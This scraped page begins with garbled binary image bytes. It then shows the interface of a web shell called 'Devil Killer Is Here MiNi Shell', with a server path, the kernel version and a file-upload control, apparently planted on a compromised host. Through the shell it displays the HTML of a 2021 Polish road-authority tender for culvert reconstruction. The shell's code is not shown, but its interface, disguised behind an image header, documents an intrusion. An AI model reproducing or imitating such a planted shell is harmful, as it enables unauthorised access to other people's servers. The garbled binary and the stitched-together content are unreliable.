JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210514/0005530902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00055309 z dnia 2021-05-14</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa przepustów w ciągu dk.nr 20 i dk.nr 31 z podziałem na 2 części: Część 1-Przebudowa przepustu w ciągu dk.nr 31 w m.Witniczka, Część 2-Przebudowa przepustu w ciągu dk.nr 20 w m.Winniki. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GENERALNA DYREKCJA DRÓG KRAJOWYCH I AUTOSTRAD ODDZIAŁ w SZCZECINIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017511575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Bohaterów Warszawy 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">igabska@gddkia.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gddkia.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami krajowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa przepustów w ciągu dk.nr 20 i dk.nr 31 z podziałem na 2 części: Część 1-Przebudowa przepustu w ciągu dk.nr 31 w m.Witniczka, Część 2-Przebudowa przepustu w ciągu dk.nr 20 w m.Winniki. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c8420eba-b48e-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00055309</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011380/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa przepustu w ciągu drogi krajowej nr 31, w m. Witniczka</p> <p class="mb-0">1.1.12 Przebudowa przepustów w ciągu dk. nr 20 z podziałem na 2 części: Część 1-Przebudowa przepustu w ciągu dk. nr 20 w miejscowości Chociwel. Część 2 - Przebudowa przepustu w ciągu dk. nr 20 w m. Winniki.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> gddkia.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">gddkia.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Instrukcja korzystania z Platformy:- w przypadku posiadania konta na Platformie - zgłoszenie dopostępowania wymaga zalogowania Wykonawcy do Platformy; po wprowadzeniu danych użytkownika,tj. adresu e-mail oraz hasła, zgłoszenie jest automatycznie akceptowane przez Platformę;- wprzypadku, gdy Wykonawca nie posiada konta na Platformie – należy w zakładce „Postępowania”,„Lista postępowań otwartych” wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś siędo udziału w postępowaniu” przejść do Formularza rejestracyjnego. - po wypełnieniu FormularzaRejestr. Wykonawca otrzymuje wiadomość elektroniczną (e-mail) informującą, że może dokonaćpierwszego logowania do Platformy. Rejestracja nowego konta podlega weryfikacji i akceptacjiOperatora, która może potrwać do 24h (8h roboczych).2. Zalecenia dotyczące podpisów. 2.1.Zalecenia odnośnie kwalifikowanego podpisu elektr.:- dla dok. w formacie „pdf” zaleca się podpisformatem PAdES (PDF Advanced Electronic Signature),- dla dokumentów w formacie innym niż „pdf”zaleca się podpis formatem XAdES (XML Advanced Electronic Signature).2.2. Zalecenia odnośniepodpisu osobistego :- w przypadku wykorzystywania aplikacji eDO App (obsługuje tylko dokumenty wformacie .pdf) na telefonach z obsługą technologii NFC wielkość dok. nie może przekraczać 5 MB,- dladok. w formacie „pdf” zaleca się podpis wewnętrzny (otoczony),- dokumenty w formacie innym niż„pdf”zaleca się podpisywać podpisem zewnętrznym lub otaczającym.3. Zalecenia odnośnie podpisuzaufanego :- wielkość plików nie może przekraczać 10 MB,- dla dokumentów w formacie „pdf” zalecasię podpis formatem PAdES (podpisany plik ma rozszerzenie .pdf),- dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES (podpisany plik ma rozszerzenie .xml).4.Niezbędnewymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:- stały dostęp do sieciInternet o gwarantowanej przepustowości nie mniejszej niż 20/4 Mb/s;- komputer klasy PC lub MAC, onastępującej konfiguracji: pamięć min 4GB RAM, Procesor Intel IV 4GHZ, jeden z systemówoperacyjnych- MS Windows 7, Mac OS x 10.4, Linux lub ich nowsze wersje;- zainstalowana dowolnaprzeglądarka internetowa obsługująca TLS 1.2, w najnowszej wersji, w przypadku Internet Explorerminimalnie wersja 11.0;- włączona obsługa JavaScript;- zainstalowany program Acrobat Reader lubinny obsługujący pliki w formacie „pdf”.5. Zamawiający dopuszcza przesyłanie danych w formatachdopuszczonych odpowiednimi przepisami prawa tj. m.in.: .doc, .docx, .txt, .xls, .xlsx, .ppt, .csv,.pdf,.jpg, .git, .png, .tif, .dwg, .ath, .kst, .zip, przy czym Zamawiający zaleca wykorzystywanie plików wformacie .pdf. Maksymalny rozmiar pojedynczego pliku to 100 MB, przy czym nie określa się limituliczby plików.6. Dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytaćjakozałączniki na Platformie, według Instrukcji korzystania z Platformy, dostępnej dla zalogowanychużytkowników w zakładce „Pomoc” – „Instrukcje”.Pytania/wnioski o wyjaśnienie treści SWZ/odwołaniaskładane są przy użyciu zakładki „Pytania/informacje”, polecenie „Nowe/wysłane” i następnie„Dodajpytanie/ komentarz”.W trakcie etapu składania ofert, oferta, oświadczenie, o którym mowa w pkt10.2. IDW, dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów luboświadczeń składające się na ofertę, składane są przez Wykonawcę przy użyciu zakładki „Załączniki”polecenie„Dodaj załącznik”.Po złożeniu ofert, dokumenty elektroniczne, oświadczenia, uzupełnienia,wyjaśnienia, elektroniczne kopie dokumentów lub oświadczeń przedstawiane przez Wykonawcę nawezwanie Zamawiającego, składane są przy użyciu zakładki „Pytania/informacje” polecenie„Nowe/wysłane” i następnie „Dodaj pytanie/ komentarz” albo jako korespondencja w wątku polecenie„Otrzymane” i następnie „Odpowiedz”.Pozostałe informacje określające SPOSÓB KOMUNIKACJIORAZ WYMAGANIA FORMALNE zostały opisane w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje , że Administratorem danychosobowych Wykonawcy jest Generalny Dyrektor Dróg Krajowych i Autostrad , ul. Wronia 53 , 00-874Warszawa , tel. (022) 375 88 88 , e-mail:kancelaria@gddkia.gov.pl . 2. W sprawach związanych zprzetwarzaniem danych osobowych , można kontaktować się z Inspektorem Ochrony Danych , zapośrednictwem adresu e-mail: iod@gddkia.gov.pl . 3. Dane osobowe będą przetwarzane w celuprzeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji . 4.Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych ,wydane na jej podstawie akty wykonawcze , a także ustawa o narodowym zasobie archiwalnym iarchiwach. 5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym zuwzględnieniem przepisów w zakresie zamówień publicznych, a także podmiotom przetwarzającymdane na podstawie zawartych umów.6. Dane osobowe Wykonawcy będą przechowywane przez okresobowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku zamówień współfinansowanychześrodków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresuobowiązywania umowy. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały oneuznane , jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy) .7. Osobie, której danedotyczą przysługuje prawo: dostępu do danych. W przypadku, gdy wykonanie obowiązku związanego zprawem dostępu do danych wymagałoby niewspółmiernie dużego wysiłku , Zamawiający może żądaćod osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celusprecyzowanieżądania, w szczególności podania nazwy lub daty postępowania o udzieleniezamówienia publicznego; sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania nawarunkach określonych w przepisach Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27kwietnia 2016 r. w sprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych iw sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia anizmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisami.Żądanie sprostowania danych nie może skutkować zmianą wyniku postępowania o udzieleniezamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresieniezgodnym z przepisami. Wystąpienie z żądaniem ograniczenia przetwarzania , nie ograniczaprzetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówieniapublicznego; wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Podanie danychjest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie ocenyspełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonaniazamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jegooferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O.Sz.D-3.2412.21.8a.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1-Przebudowa przepustu w ciągu dk. nr 31 w m. Witniczka. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221000-2 - Roboty budowlane w zakresie budowy mostów i tuneli, szybów i kolei podziemnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej ofertyZamawiającystosować będzie następujące kryteria oceny ofert: Cena – 60 % = 60 pkt,Okres rękojmi zawady fizyczne – 25%=25 pkt, Termin realizacji – 15%=15 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi za wady fizyczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Przy dokonywaniu wyboru najkorzystniejszej ofertyZamawiającystosować będzie następujące kryteria oceny ofert: Cena – 60 % = 60 pkt,Okres rękojmi zawady fizyczne – 25%=25 pkt, Termin realizacji – 15%=15 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Przebudowa przepustu w ciągu dk. nr 20 w m. Winniki. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221000-2 - Roboty budowlane w zakresie budowy mostów i tuneli, szybów i kolei podziemnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej ofertyZamawiającystosować będzie następujące kryteria oceny ofert: Cena – 60 % = 60 pkt,Okres rękojmi zawady fizyczne – 25%=25 pkt, Termin realizacji – 15%=15 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi za wady fizyczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Przy dokonywaniu wyboru najkorzystniejszej ofertyZamawiającystosować będzie następujące kryteria oceny ofert: Cena – 60 % = 60 pkt,Okres rękojmi zawady fizyczne – 25%=25 pkt, Termin realizacji – 15%=15 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dot. zdolności technicznej lub zawodowej:A) dotyczącej Wykonawcy:Wykonawca musi wykazaćsię wiedzą i doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tymokresie, co najmniej:Dla części 1 i 2:- 2 robót budowlanych polegających na budowie lubprzebudowie lub remoncie obiektu mostowego lub przepustu na drodze klasy min. G o wartościnie mniejszej niż 500 000,00 PLN brutto każda.Ilekroć w treści SWZ jest mowa o: „budowie”,„przebudowie” lub „remoncie” - należy przez to rozumieć odpowiednio budowę lub przebudowęlub remont w rozumieniu ustawy Prawo budowlane; Jako wykonanie (zakończenie) robotybudowlanej należy rozumieć wystawienie Świadectwa Przejęcia (wydanego zgodnie zSubklauzulą 10.1 dla kontraktów realizowanych zgodnie z warunkami FIDIC) lub podpisaniekońcowego Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, wktórych nie wystawia się Świadectwa Przejęcia).Wartości podane w dokumentachpotwierdzających spełnienie warunku w walutach innych niż wskazane przez Zamawiającegonależy przeliczyć według średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia(wydanego zgodnie z Subklauzulą 10.1 dla kontraktów realizowanych zgodnie z warunkamiFIDIC) lub na dzień podpisania końcowego Protokołu odbioru robót lub równoważnegodokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).Zadrogę Zamawiający uzna drogę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2020 poz. 470 ze zm.).Za obiekt mostowy Zamawiający uzna obiektmostowy w rozumieniu rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maja2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiektyinżynierskie i ich usytuowanie (Dz. U. z 2000 nr 63 poz. 735 ze zm.).B) dotyczącejosób:Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia,legitymujące się kwalifikacjami zawodowymi, doświadczeniem odpowiednim do funkcji, jakiezostaną im powierzone. Wykonawca na każdą funkcję wymienioną poniżej, wskaże osoby, któremusi mieć dostępne na etapie realizacji zamówienia, spełniające następujące wymagania:Dlaczęści 1:Osoba proponowana do pełnienia funkcji: Kierownika Budowy- minimalna liczba osób:1- minimalne kwalifikacje zawodowe i doświadczenie: - posiadająca uprawnienia budowlane dopełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotamibudowlanymi w specjalności inżynieryjnej mostowej bez ograniczeń, oraz - posiadającadoświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub kierownika robótmostowych na co najmniej 2 robotach budowlanych polegających na budowie lub przebudowiedrogowych obiektów inżynierskich o wartości nie mniejszej niż 500 000,00 PLN brutto każda.Dlaczęści 2:Osoba proponowana do pełnienia funkcji: Kierownika Budowy- minimalna liczba osób:1- minimalne kwalifikacje zawodowe i doświadczenie: - posiadająca uprawnienia budowlane dopełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotamibudowlanymi w specjalności inżynieryjnej mostowej bez ograniczeń, oraz - posiadającadoświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub kierownika robótmostowych na co najmniej 2 robotach budowlanych polegających na budowie lub przebudowiedrogowych obiektów inżynierskich o wartości nie mniejszej niż 500 000,00 PLN bruttokażda.Zamawiający nie dopuszcza przedstawienia tej samej osób na więcej niż jednej części. Wprzypadku składania oferty na więcej niż jedną część Wykonawca zobowiązany jest dowskazania innych osób, oddzielnie na każdą część.Ilekroć w treści SWZ jest mowa o„uprawnieniach budowlanych”, „budowie”, „przebudowie”, 